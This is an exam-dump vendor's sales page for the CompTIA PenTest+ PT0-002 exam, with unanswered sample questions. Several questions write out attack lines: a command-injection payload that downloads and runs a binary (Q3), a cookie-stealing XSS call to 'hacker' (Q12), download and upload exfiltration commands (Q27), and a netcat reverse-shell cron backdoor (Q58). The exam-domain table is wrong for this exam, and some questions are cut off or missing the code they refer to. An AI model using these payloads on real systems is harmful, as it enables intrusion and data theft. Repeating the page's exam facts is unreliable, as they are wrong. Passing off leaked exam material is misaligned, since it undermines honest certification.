• support@dumpspool.com
SPECIAL LIMITED TIME DISCOUNT OFFER. USE DISCOUNT CODE TO GET 20% OFF DP2021

PDF Only

$35.00 Free Updates Upto 90 Days

  • PT0-002 Dumps PDF
  • 396 Questions
  • Updated On March 25, 2024

PDF + Test Engine

$60.00 Free Updates Upto 90 Days

  • PT0-002 Question Answers
  • 396 Questions
  • Updated On March 25, 2024

Test Engine

$50.00 Free Updates Upto 90 Days

  • PT0-002 Practice Questions
  • 396 Questions
  • Updated On March 25, 2024
Check Our Free CompTIA PT0-002 Online Test Engine Demo.

How to pass CompTIA PT0-002 exam with the help of dumps?

DumpsPool provides you the finest quality resources you’ve been looking for to no avail. So, it's due time you stop stressing and get ready for the exam. Our Online Test Engine provides you with the guidance you need to pass the certification exam. We guarantee top-grade results because we know we’ve covered each topic in a precise and understandable manner. Our expert team prepared the latest CompTIA PT0-002 Dumps to satisfy your need for training. Plus, they are in two different formats: Dumps PDF and Online Test Engine.

How Do I Know CompTIA PT0-002 Dumps are Worth it?

Did we mention our latest PT0-002 Dumps PDF is also available as Online Test Engine? And that’s just the point where things start to take root. Of all the amazing features you are offered here at DumpsPool, the money-back guarantee has to be the best one. Now that you know you don’t have to worry about the payments. Let us explore all other reasons you would want to buy from us. Other than affordable Real Exam Dumps, you are offered three-month free updates.

You can easily scroll through our large catalog of certification exams. And, pick any exam to start your training. That’s right, DumpsPool isn’t limited to just CompTIA Exams. We trust our customers need the support of an authentic and reliable resource. So, we made sure there is never any outdated content in our study resources. Our expert team makes sure everything is up to the mark by keeping an eye on every single update. Our main concern and focus are that you understand the real exam format. So, you can pass the exam in an easier way!

IT Students Are Using our CompTIA PenTest+ Certification Exam Dumps Worldwide!

It is a well-established fact that certification exams can’t be conquered without some help from experts. The point of using CompTIA PenTest+ Certification Exam Practice Question Answers is exactly that. You are constantly surrounded by IT experts who’ve been through you are about to and know better. The 24/7 customer service of DumpsPool ensures you are in touch with these experts whenever needed. Our 100% success rate and validity around the world, make us the most trusted resource candidates use. The updated Dumps PDF helps you pass the exam on the first attempt. And, with the money-back guarantee, you feel safe buying from us. You can claim your return on not passing the exam.

How to Get PT0-002 Real Exam Dumps?

Getting access to the real exam dumps is as easy as pressing a button, literally! There are various resources available online, but the majority of them sell scams or copied content. So, if you are going to attempt the PT0-002 exam, you need to be sure you are buying the right kind of Dumps. All the Dumps PDF available on DumpsPool are as unique and the latest as they can be. Plus, our Practice Question Answers are tested and approved by professionals. Making it the top authentic resource available on the internet. Our expert has made sure the Online Test Engine is free from outdated & fake content, repeated questions, and false plus indefinite information, etc. We make every penny count, and you leave our platform fully satisfied!

CompTIA PT0-002 COMPLETE EXAM DETAIL

Detail Value
Total Time 90 minutes
Exam Fee $349 USD
Passing Marks 750 (on a scale of 100-900)
Available Languages English, Japanese, German, Portuguese, Spanish
Exam Code PT0-002
Exam Format Multiple Choice and Performance-Based
Exam Domains
  • 1.0 Threats, Attacks, and Vulnerabilities (25%)
  • 2.0 Technologies and Tools (24%)
  • 3.0 Architecture and Design (21%)
  • 4.0 Identity and Access Management (20%)
  • 5.0 Risk Management (10%)

 CompTIA PenTest+ EXAM TOPICS BREAKDOWN

Domain Percentage Topics
1.0 Threats, Attacks, and Vulnerabilities 25%
  • Social Engineering
  • Malware
  • Software-Based Attacks
  • Physical Attacks
  • Wireless Attacks
  • Cloud-Based Attacks
2.0 Technologies and Tools 24%
  • Penetration Testing Tools
  • Forensic Tools
  • Automated Security Tools
  • Networking Tools
  • Cryptography Tools
3.0 Architecture and Design 21%
  • Secure Network Design
  • Secure Systems Design
  • Secure Mobile Device and Application Design
  • Secure Cloud Design
4.0 Identity and Access Management 20%
  • Authentication Factors
  • Access Control Models
  • Single Sign-On (SSO)
  • Identity Federation
5.0 Risk Management 10%
  • Security Control Testing
  • Incident Response
  • Disaster Recovery Planning
  • Risk Management Frameworks
CompTIA PT0-002 Sample Question Answers

Question # 1

A penetration tester has been hired to perform a physical penetration test to gain access toa secure room within a client’s building. Exterior reconnaissance identifies two entrances, aWiFi guest network, and multiple security cameras connected to the Internet.Which of the following tools or techniques would BEST support additional reconnaissance?c

A. Wardriving
B. Shodan
C. Recon-ng
D. Aircrack-ng

Question # 2

Given the following script:while True:print ("Hello World")Which of the following describes True?

A. A while loop
B. A conditional
C. A Boolean operator
D. An arithmetic operator

Question # 3

A penetration tester was able to gain access to a system using an exploit. The following isa snippet of the code that was utilized:exploit = “POST ”exploit += “/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} –c${IFS}’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache’%0A%27&loginUser=a&Pwd=a”exploit += “HTTP/1.1”Which of the following commands should the penetration tester run post-engagement?

A. grep –v apache ~/.bash_history > ~/.bash_history
B. rm –rf /tmp/apache
C. chmod 600 /tmp/apache
D. taskkill /IM “apache” /F

Question # 4

A penetration tester has obtained shell access to a Windows host and wants to run aspecially crafted binary for later execution using the wmic.exe process call create function.Which of the following OS or filesystem mechanisms is MOST likely to support thisobjective?

A. Alternate data streams
B. PowerShell modules
C. MP4 steganography
D. PsExec

Question # 5

Which of the following is a regulatory compliance standard that focuses on user privacy byimplementing the right to be forgotten?

A. NIST SP 800-53
B. ISO 27001
C. GDPR

Question # 6

Penetration on an assessment for a client organization, a penetration tester noticesnumerous outdated software package versions were installed ...s-critical servers. Which ofthe following would best mitigate this issue?

A. Implementation of patching and change control programs
B. Revision of client scripts used to perform system updates
C. Remedial training for the client's systems administrators
D. Refrainment from patching systems until quality assurance approves

Question # 7

Which of the following OSSTM testing methodologies should be used to test under theworst conditions?

A. Tandem
B. Reversal
C. Semi-authorized
D. Known environment

Question # 8

A penetration tester ran a simple Python-based scanner. The following is a snippet of thecode: Which of the following BEST describes why this script triggered a `probable port scan` alertin the organization's IDS?

A. sock.settimeout(20) on line 7 caused each next socket to be created every 20milliseconds.
B. *range(1, 1025) on line 1 populated the portList list in numerical order.
C. Line 6 uses socket.SOCK_STREAM instead of socket.SOCK_DGRAM
D. The remoteSvr variable has neither been type-hinted nor initialized.

Question # 9

A client wants a security assessment company to perform a penetration test against its hotsite. The purpose of the test is to determine the effectiveness of the defenses that protectagainst disruptions to business continuity. Which of the following is the MOST importantaction to take before starting this type of assessment?

A. Ensure the client has signed the SOW.
B. Verify the client has granted network access to the hot site.
C. Determine if the failover environment relies on resources not owned by the client.
D. Establish communication and escalation procedures with the client.

Question # 10

Which of the following factors would a penetration tester most likely consider when testingat a location?

A. Determine if visas are required.
B. Ensure all testers can access all sites.
C. Verify the tools being used are legal for use at all sites.
D. Establish the time of the day when a test can occur.

Question # 11

A penetration tester was brute forcing an internal web server and ran a command thatproduced the following output: However, when the penetration tester tried to browse the URLhttp://172.16.100.10:3000/profile, a blank page was displayed.Which of the following is the MOST likely reason for the lack of output?

A. The HTTP port is not open on the firewall.
B. The tester did not run sudo before the command.
C. The web server is using HTTPS instead of HTTP.
D. This URI returned a server error.

Question # 12

Given the following code: var+img=new+Image();img.src=”<a href="http://hacker/%20+%20document.cookie">http://hacker/%20+%20document.cookie</a>;</SCvar+img=new+Image();img.src=”<a href="http://hacker/%20+%20document.cookie">http://hacker/%20+%20document.cookie</a>;</SC RIPT>Which of the following are the BEST methods to prevent against this type of attack?(Choose two.)

A. Web-application firewall
B. Parameterized queries
C. Output encoding
D. Session tokens
E. Input validation
F. Base64 encoding

Question # 13

A penetration tester learned that when users request password resets, help desk analystschange users' passwords to 123change. The penetration tester decides to brute force aninternet-facing webmail to check which users are still using the temporary password. Thetester configures the brute-force tool to test usernames found on a text file and the... Whichof the following techniques is the penetration tester using?

A. Password brute force attack
B. SQL injection
C. Password spraying
D. Kerberoasting

Question # 14

A penetration tester is exploring a client’s website. The tester performs a curl commandand obtains the following:* Connected to 10.2.11.144 (::1) port 80 (#0)> GET /readmine.html HTTP/1.1> Host: 10.2.11.144> User-Agent: curl/7.67.0> Accept: */*>* Mark bundle as not supporting multiuse< HTTP/1.1 200< Date: Tue, 02 Feb 2021 21:46:47 GMT< Server: Apache/2.4.41 (Debian)< Content-Length: 317< Content-Type: text/html; charset=iso-8859-1<<!DOCTYPE html><html lang=”en”><head> <meta name=”viewport” content=”width=device-width” /><meta http-equiv=”Content-Type” content=”text/html; charset=utf-8” /><title>WordPress &#8250; ReadMe</title><link rel=”stylesheet” href=”wp-admin/css/install.css?ver=20100228” type=”text/css” /></head>Which of the following tools would be BEST for the penetration tester to use to explore thissite further?

A. Burp Suite
B. DirBuster
C. WPScan
D. OWASP ZAP

Question # 15

When accessing the URL http://192.168.0-1/validate/user.php, a penetration testerobtained the following output ..d index: eid in /apache/www/validate/user.php line 12 ..d index: uid in  /apache/www/validate/user.php line 13 ..d index: pw in /apache/www/validate/user.php line 14 ..d index: acl in /apache/www/validate/user.php line 15 

A. Lack of code signing
B. Incorrect command syntax
C. Insufficient error handling
D. Insecure data transmission

Question # 16

After compromising a system, a penetration tester wants more information in order todecide what actions to take next. The tester runs the following commands: Which of the following attacks is the penetration tester most likely trying to perform?

A. Metadata service attack
B. Container escape techniques
C. Credential harvesting
D. Resource exhaustion

Question # 17

A penetration tester wrote the following comment in the final report: "Eighty-five percent ofthe systems tested were found to be prone to unauthorized access from the internet."Which of the following audiences was this message intended?

A. Systems administrators
B. C-suite executives
C. Data privacy ombudsman
D. Regulatory officials

Question # 18

A penetration tester runs a scan against a server and obtains the following output:21/tcp open ftp Microsoft ftpd| ftp-anon: Anonymous FTP login allowed (FTP code 230)| 03-12-20 09:23AM 331 index.aspx| ftp-syst:135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds Microsoft Windows Server 2012 Std3389/tcp open ssl/ms-wbt-server| rdp-ntlm-info:| Target Name: WEB3| NetBIOS_Computer_Name: WEB3| Product_Version: 6.3.9600|_ System_Time: 2021-01-15T11:32:06+00:008443/tcp open http Microsoft IIS httpd 8.5| http-methods:|_ Potentially risky methods: TRACE|_http-server-header: Microsoft-IIS/8.5|_http-title: IIS Windows ServerWhich of the following command sequences should the penetration tester try NEXT?

A. ftp 192.168.53.23
B. smbclient \\\\WEB3\\IPC$ -I 192.168.53.23 –U guest
C. ncrack –u Administrator –P 15worst_passwords.txt –p rdp 192.168.53.23
D. curl –X TRACE https://192.168.53.23:8443/index.aspx
E. nmap –-script vuln –sV 192.168.53.23

Question # 19

In an unprotected network file repository, a penetration tester discovers a text filecontaining usernames and passwords in cleartext and a spreadsheet containing data for 50employees, including full names, roles, and serial numbers. The tester realizes some of thepasswords in the text file follow the format: <name- serial_number>. Which of the followingwould be the best action for the tester to take NEXT with this information?

A. Create a custom password dictionary as preparation for password spray testing.
B. Recommend using a password manage/vault instead of text files to store passwordssecurely.
C. Recommend configuring password complexity rules in all the systems and applications.
D. Document the unprotected file repository as a finding in the penetration-testing report.

Question # 20

A CentOS computer was exploited during a penetration test. During initial reconnaissance,the penetration tester discovered that port 25 was open on an internalSendmail server. To remain stealthy, the tester ran the following command from the attackmachine: Which of the following would be the BEST command to use for further progress into thetargeted network?

A. nc 10.10.1.2
B. ssh 10.10.1.2
C. nc 127.0.0.1 5555
D. ssh 127.0.0.1 5555

Question # 21

Company.com has hired a penetration tester to conduct a phishing test. The tester wants toset up a fake log-in page and harvest credentials when target employees click on links in aphishing email. Which of the following commands would best help the tester determinewhich cloud email provider the log-in page needs to mimic?

A. dig company.com MX
B. whois company.com
C. cur1 www.company.com
D. dig company.com A

Question # 22

During an assessment, a penetration tester inspected a log and found a series ofthousands of requests coming from a single IP address to the same URL. A few of therequests are listed below. Which of the following vulnerabilities was the attacker trying to exploit?

A. ..Session hijacking
B. ..URL manipulation
C. ..SQL injection
D. ..Insecure direct object reference

Question # 23

A penetration tester writes the following script: Which of the following is the tester performing?

A. Searching for service vulnerabilities
B. Trying to recover a lost bind shell
C. Building a reverse shell listening on specified ports
D. Scanning a network for specific open ports

Question # 24

During a penetration test, a tester is in close proximity to a corporate mobile devicebelonging to a network administrator that is broadcasting Bluetooth frames.Which of the following is an example of a Bluesnarfing attack that the penetration testercan perform?

A. Sniff and then crack the WPS PIN on an associated WiFi device.
B. Dump the user address book on the device.
C. Break a connection between two Bluetooth devices.
D. Transmit text messages to the device.

Question # 25

A company recently moved its software development architecture from VMs to containers.The company has asked a penetration tester to determine if the new containers areconfigured correctly against a DDoS attack. Which of the following should a tester performfirst?

A. Test the strength of the encryption settings.
B. Determine if security tokens are easily available.
C. Perform a vulnerability check against the hypervisor.
D. .Scan the containers for open ports.

Question # 26

A penetration tester breaks into a company's office building and discovers the companydoes not have a shredding service. Which of the following attacks should the penetrationtester try next?

A. Dumpster diving
B. Phishing
C. Shoulder surfing
D. Tailgating

Question # 27

A penetration tester has obtained a low-privilege shell on a Windows server with a defaultconfiguration and now wants to explore the ability to exploit misconfigured servicepermissions. Which of the following commands would help the tester START this process?

A. certutil –urlcache –split –f http://192.168.2.124/windows-binaries/ accesschk64.exe
B. powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/upload.php’, ‘systeminfo.txt’)
C. schtasks /query /fo LIST /v | find /I “Next Run Time:”
D. wget http://192.168.2.124/windows-binaries/accesschk64.exe –O accesschk64.exe

Question # 28

Which of the following documents describes activities that are prohibited during ascheduled penetration test?

A. MSA
B. NDA
C. ROE
D. SLA

Question # 29

During a penetration tester found a web component with no authentication requirements.The web component also allows file uploads and is hosted on one of the target public webthe following actions should the penetration tester perform next?

A. Continue the assessment and mark the finding as critical.
B. Attempting to remediate the issue temporally.
C. Notify the primary contact immediately.
D. Shutting down the web server until the assessment is finished

Question # 30

During an assessment, a penetration tester gathered OSINT for one of the IT systems administrators from the target company and managed to obtain valuable information, including corporate email addresses. Which of the following techniques should the penetration tester perform NEXT?

A. Badge cloning 
B. Watering-hole attack 
C. Impersonation 
D. Spear phishing

Question # 31

An exploit developer is coding a script that submits a very large number of small requests to a web server until the server is compromised. The script must examine each response received and compare the data to a large number of strings to determine which data to submit next. Which of the following data structures should the exploit developer use to make the string comparison and determination as efficient as possible? 

A. A list 
B. A tree 
C. A dictionary 
D. An array 

Question # 32

A penetration tester who is performing a physical assessment of a company’s security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information? 

A. Badge cloning 
B. Dumpster diving 
C. Tailgating 
D. Shoulder surfing 

Question # 33

A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as permitted by the ROE. The tester noticed the client's data included PII, which is out of scope, and immediately stopped the transfer. Which of the following MOST likely explains the penetration tester's decision? 

A. The tester had the situational awareness to stop the transfer. 
B. The tester found evidence of prior compromise within the data set. 
C. The tester completed the assigned part of the assessment workflow. 
D. The tester reached the end of the assessment time frame. 

Question # 34

A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective? 

A. Wait for the next login and perform a downgrade attack on the server. 
B. Capture traffic using Wireshark. 
C. Perform a brute-force attack over the server. 
D. Use an FTP exploit against the server. 

Question # 35

Given the following output: User-agent:* Disallow: /author/ Disallow: /xmlrpc.php Disallow: /wp-admin Disallow: /page/ During which of the following activities was this output MOST likely obtained? 

A. Website scraping 
B. Website cloning
 C. Domain enumeration 
D. URL enumeration 

Question # 36

A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test. Which of the following describes the scope of the assessment? 

A. Partially known environment testing 
B. Known environment testing 
C. Unknown environment testing 
D. Physical environment testing 

Question # 37

A company’s Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi’s router. Which of the following is MOST vulnerable to a brute-force attack? 

A. WPS 
B. WPA2-EAP 
C. WPA-TKIP
 D. WPA2-PSK 

Question # 38

Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report? 

A. S/MIME 
B. FTPS 
C. DNSSEC 
D. AS2 

Question # 39

A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data. Which of the following should the tester do with this information to make this a successful exploit? 

A. Perform XSS. 
B. Conduct a watering-hole attack. 
C. Use BeEF. 
D. Use browser autopwn. 

Question # 40

A penetration-testing team needs to test the security of electronic records in a company's office. Per the terms of engagement, the penetration test is to be conducted after hours and should not include circumventing the alarm or performing destructive entry. During outside reconnaissance, the team sees an open door from an adjoining building. Which of the following would be allowed under the terms of the engagement? 

A. Prying the lock open on the records room 
B. Climbing in an open window of the adjoining building 
C. Presenting a false employee ID to the night guard 
D. Obstructing the motion sensors in the hallway of the records room 

Question # 41

A penetration tester received a .pcap file to look for credentials to use in an engagement. Which of the following tools should the tester utilize to open and read the .pcap file?

A. Nmap 
B. Wireshark 
C. Metasploit 
D. Netcat 

Question # 42

Which of the following types of assessments MOST likely focuses on vulnerabilities with the objective to access specific data? 

A. An unknown-environment assessment 
B. A known-environment assessment 
C. A red-team assessment 
D. A compliance-based assessment 

Question # 43

Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems: 

A. will reveal vulnerabilities in the Modbus protocol. 
B. may cause unintended failures in control systems. 
C. may reduce the true positive rate of findings. 
D. will create a denial-of-service condition on the IP networks. 

Question # 44

A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions? 

A. Aircrack-ng 
B. Wireshark 
C. Wifite 
D. Kismet 

Question # 45

During an engagement, a penetration tester found the following list of strings inside a file:  Which of the following is the BEST technique to determine the known plaintext of the strings?

A. Dictionary attack 
B. Rainbow table attack 
C. Brute-force attack 
D. Credential-stuffing attack 

Question # 46

During the scoping phase of an assessment, a client requested that any remote code exploits discovered during testing would be reported immediately so the vulnerability could be fixed as soon as possible. The penetration tester did not agree with this request, and after testing began, the tester discovered a vulnerability and gained internal access to the system. Additionally, this scenario led to a loss of confidential credit card data and a hole in the system. At the end of the test, the penetration tester willfully failed to report this information and left the vulnerability in place. A few months later, the client was breached and credit card data was stolen. After being notified about the breach, which of the following steps should the company take NEXT? 

A. Deny that the vulnerability existed 
B. Investigate the penetration tester.
 C. Accept that the client was right. 
D. Fire the penetration tester. 

Question # 47

When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because: 

A. security compliance regulations or laws may be violated. 
B. testing can make detecting actual APT more challenging. 
C. testing adds to the workload of defensive cyber- and threat-hunting teams. 
D. business and network operations may be impacted. 

Question # 48

Which of the following would assist a penetration tester the MOST when evaluating the susceptibility of top-level executives to social engineering attacks? 

A. Scraping social media for personal details 
B. Registering domain names that are similar to the target company's
 C. Identifying technical contacts at the company 
D. Crawling the company's website for company information 

Question # 49

A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:  Which of the following tools will help the tester prepare an attack for this scenario?

A. Hydra and crunch 
B. Netcat and cURL 
C. Burp Suite and DIRB 
D. Nmap and OWASP ZAP 

Question # 50

A penetration tester is examining a Class C network to identify active systems quickly. Which of the following commands should the penetration tester use? 

A. nmap sn 192.168.0.1/16 
B. nmap sn 192.168.0.1-254 
C. nmap sn 192.168.0.1 192.168.0.1.254 
D. nmap sN 192.168.0.0/24 

Question # 51

A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987. Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL? 

A. SQLmap 
B. Nessus 
C. Nikto 
D. DirBuster 

Question # 52

A penetration tester opened a shell on a laptop at a client's office but is unable to pivot because of restrictive ACLs on the wireless subnet. The tester is also aware that all laptop users have a hard-wired connection available at their desks. Which of the following is the BEST method available to pivot and gain additional access to the network? 

A. Set up a captive portal with embedded malicious code. 
B. Capture handshakes from wireless clients to crack. 
C. Span deauthentication packets to the wireless clients. 
D. Set up another access point and perform an evil twin attack. 

Question # 53

Which of the following types of information would MOST likely be included in an application security assessment report addressed to developers? (Choose two.) 

A. Use of non-optimized sort functions 
B. Poor input sanitization 
C. Null pointer dereferences 
D. Non-compliance with code style guide 
E. Use of deprecated Javadoc tags 
F. A cydomatic complexity score of 3 

Question # 54

The attacking machine is on the same LAN segment as the target host during an internal penetration test. Which of the following commands will BEST enable the attacker to conduct host delivery and write the discovery to files without returning results of the attack machine?

 A. nmap snn exclude 10.1.1.15 10.1.1.0/24 oA target_txt
 B. nmap iR10oX out.xml | grep Nmap | cut d "f5 > live-hosts.txt 
C. nmap PnsV OiL target.txt A target_text_Service 
D. nmap sSPn n iL target.txt A target_txtl 

Question # 55

A security analyst needs to perform a scan for SMB port 445 over a/16 network. Which of the following commands would be the BEST option when stealth is not a concern and the task is time sensitive? 

A. Nmap -s 445 -Pn -T5 172.21.0.0/16 
B. Nmap -p 445 -n -T4 -open 172.21.0.0/16 
C. Nmap -sV --script=smb* 172.21.0.0/16 
D. Nmap -p 445 -max -sT 172. 21.0.0/16 

Question # 56

A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them? 

A. As backup in case the original documents are lost 
B. To guide them through the building entrances 
C. To validate the billing information with the client 
D. As proof in case they are discovered 

Question # 57

During a web application test, a penetration tester was able to navigate to https://company.com and view all links on the web page. After manually reviewing the pages, the tester used a web scanner to automate the search for vulnerabilities. When returning to the web application, the following message appeared in the browser: unauthorized to view this page. Which of the following BEST explains what occurred? 

A. The SSL certificates were invalid. 
B. The tester IP was blocked. 
C. The scanner crashed the system. 
D. The web page was not found. 

Question # 58

A penetration tester was able to gain access successfully to a Windows workstation on a mobile client’s laptop. Which of the following can be used to ensure the tester is able to maintain access to the system? 

A. schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe 
B. wmic startup get caption,command 
C. crontab –l; echo “@reboot sleep 200 && ncat –lvp 4242 –e /bin/bash”) | crontab 2>/dev/null 
D. sudo useradd –ou 0 –g 0 user 

Question # 59

A penetration tester is able to use a command injection vulnerability in a web application to get a reverse shell on a system After running a few commands, the tester runs the following: python -c 'import pty; pty.spawn("/bin/bash")' Which of the following actions Is the penetration tester performing? 

A. Privilege escalation 
B. Upgrading the shell 
C. Writing a script for persistence 
D. Building a bind shell 

Question # 60

After running the enum4linux.pl command, a penetration tester received the following output:  Which of the following commands should the penetration tester run NEXT?

A. smbspool //192.160.100.56/print$ 
B. net rpc share -S 192.168.100.56 -U '' 
C. smbget //192.168.100.56/web -U '' 
D. smbclient //192.168.100.56/web -U '' -N 

Question # 61

Which of the following is a rules engine for managing public cloud accounts and resources? 

A. Cloud Custodian 
B. Cloud Brute 
C. Pacu 
D. Scout Suite 

Question # 62

Which of the following can be used to store alphanumeric data that can be fed into scripts or programs as input to penetration-testing tools? 

A. Dictionary 
B. Directory 
C. Symlink 
D. Catalog 
E. For-loop 

Question # 63

A penetration tester is conducting an authorized, physical penetration test to attempt to enter a client's building during non-business hours. Which of the following are MOST important for the penetration tester to have during the test? (Choose two.) 

A. A handheld RF spectrum analyzer 
B. A mask and personal protective equipment 
C. Caution tape for marking off insecure areas
 D. A dedicated point of contact at the client 
E. The paperwork documenting the engagement 
F. Knowledge of the building's normal business hours 

Question # 64

A company is concerned that its cloud VM is vulnerable to a cyberattack and proprietary data may be stolen. A penetration tester determines a vulnerability does exist and exploits the vulnerability by adding a fake VM instance to the IaaS component of the client's VM. Which of the following cloud attacks did the penetration tester MOST likely implement? 

A. Direct-to-origin 
B. Cross-site scripting 
C. Malware injection 
D. Credential harvesting 

Question # 65

A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server. Which of the following can be done with the pcap to gain access to the server? 

A. Perform vertical privilege escalation. 
B. Replay the captured traffic to the server to recreate the session. 
C. Use John the Ripper to crack the password. 
D. Utilize a pass-the-hash attack. 

Question # 66

A penetration tester has established an on-path position between a target host and local network services but has not been able to establish an on-path position between the target host and the Internet. Regardless, the tester would like to subtly redirect HTTP connections to a spoofed server IP. Which of the following methods would BEST support the objective? 

A. Gain access to the target host and implant malware specially crafted for this purpose. 
B. Exploit the local DNS server and add/update the zone records with a spoofed A record. 
C. Use the Scapy utility to overwrite name resolution fields in the DNS query response. 
D. Proxy HTTP connections from the target host to that of the spoofed host. 

Question # 67

The results of an Nmap scan are as follows: Which of the following would be the BEST conclusion about this device?

A. This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory. 
B. This device is most likely a gateway with in-band management services. 
C. This device is most likely a proxy server forwarding requests over TCP/443. 
D. This device may be vulnerable to remote code execution because of a butter overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation. 

Question # 68

Which of the following tools provides Python classes for interacting with network protocols? 

A. Responder
 B. Impacket 
C. Empire 
D. PowerSploit 

Question # 69

The output from a penetration testing tool shows 100 hosts contained findings due to improper patch management. Which of the following did the penetration tester perform? 

A. A vulnerability scan 
B. A WHOIS lookup 
C. A packet capture 
D. An Nmap scan 

Question # 70

Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet? 

A. Unsupported operating systems 
B. Susceptibility to DDoS attacks 
C. Inability to network 
D. The existence of default passwords 

Question # 71

PCI DSS requires which of the following as part of the penetration-testing process? 

A. The penetration tester must have cybersecurity certifications. 
B. The network must be segmented. 
C. Only externally facing systems should be tested. 
D. The assessment must be performed during non-working hours. 

Question # 72

In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: . Which of the following would be the best action for the tester to take NEXT with this information? 

A. Create a custom password dictionary as preparation for password spray testing. 
B. Recommend using a password manage/vault instead of text files to store passwords securely. 
C. Recommend configuring password complexity rules in all the systems and applications. 
D. Document the unprotected file repository as a finding in the penetration-testing report. 

Question # 73

Appending string values onto another string is called: 

A. compilation 
B. connection 
C. concatenation 
D. conjunction

Question # 74

A Chief Information Security Officer wants to evaluate the security of the company's ecommerce application. Which of the following tools should a penetration tester use FIRST to obtain relevant information from the application without triggering alarms? 

A. SQLmap 
B. DirBuster 
C. w3af 
D. OWASP ZAP 

Question # 75

A penetration tester is conducting a penetration test. The tester obtains a root-level shell on a Linux server and discovers the following data in a file named password.txt in the /home/svsacct directory: U3VQZXIkM2NyZXQhCg== Which of the following commands should the tester use NEXT to decode the contents of the file? 

A. echo U3VQZXIkM2NyZXQhCg== | base64 €"d 
B. tar zxvf password.txt 
C. hydra €"l svsacct €"p U3VQZXIkM2NyZXQhCg== ssh://192.168.1.0/24 
D. john --wordlist /usr/share/seclists/rockyou.txt password.txt 

Question # 76

Penetration tester has discovered an unknown Linux 64-bit executable binary. Which of the following tools would be BEST to use to analyze this issue? 

A. Peach
 B. WinDbg 
C. GDB 
D. OllyDbg 

Question # 77

A penetration tester receives the following results from an Nmap scan: Which of the following OSs is the target MOST likely running?

A. CentOS 
B. Arch Linux 
C. Windows Server 
D. Ubuntu 

Question # 78

A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test. Which of the following should the tester be sure to remove from the system? (Choose two.) 

A. Spawned shells 
B. Created user accounts 
C. Server logs 
D. Administrator accounts 
E. Reboot system 
F. ARP cache 

Question # 79

A private investigation firm is requesting a penetration test to determine the likelihood that attackers can gain access to mobile devices and then exfiltrate data from those devices. Which of the following is a social-engineering method that, if successful, would MOST likely enable both objectives? 

A. Send an SMS with a spoofed service number including a link to download a malicious application. 
B. Exploit a vulnerability in the MDM and create a new account and device profile. 
C. Perform vishing on the IT help desk to gather a list of approved device IMEIs for masquerading. 
D. Infest a website that is often used by employees with malware targeted toward x86 architectures.